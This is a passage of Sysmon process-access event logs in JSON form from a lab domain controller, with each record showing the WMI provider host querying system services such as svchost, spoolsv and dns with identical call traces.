RT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5806,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.487\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F6D-5F25-0000-0010029D0200}\r\nTargetProcessId: 2240\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.487","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F6D-5F25-0000-0010029D0200}","TargetProcessId":"2240","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5807,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.487\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001073B90200}\r\nTargetProcessId: 2900\r\nTargetImage: C:\\Windows\\System32\\spoolsv.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.487","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001073B90200}","TargetProcessId":"2900","TargetImage":"C:\\Windows\\System32\\spoolsv.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5808,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.487\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-00106CBC0200}\r\nTargetProcessId: 2744\r\nTargetImage: C:\\Program Files\\Amazon\\SSM\\amazon-ssm-agent.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.487","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-00106CBC0200}","TargetProcessId":"2744","TargetImage":"C:\\Program Files\\Amazon\\SSM\\amazon-ssm-agent.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5809,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.487\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001087BC0200}\r\nTargetProcessId: 2888\r\nTargetImage: C:\\Windows\\system32\\dns.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.487","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001087BC0200}","TargetProcessId":"2888","TargetImage":"C:\\Windows\\system32\\dns.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5810,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.487\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-00108BBC0200}\r\nTargetProcessId: 2884\r\nTargetImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.487","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-00108BBC0200}","TargetProcessId":"2884","TargetImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5811,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.503\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.503","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5812,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.503\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010BFBC0200}\r\nTargetProcessId: 2856\r\nTargetImage: C:\\Windows\\System32\\ismserv.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.503","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010BFBC0200}","TargetProcessId":"2856","TargetImage":"C:\\Windows\\System32\\ismserv.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPC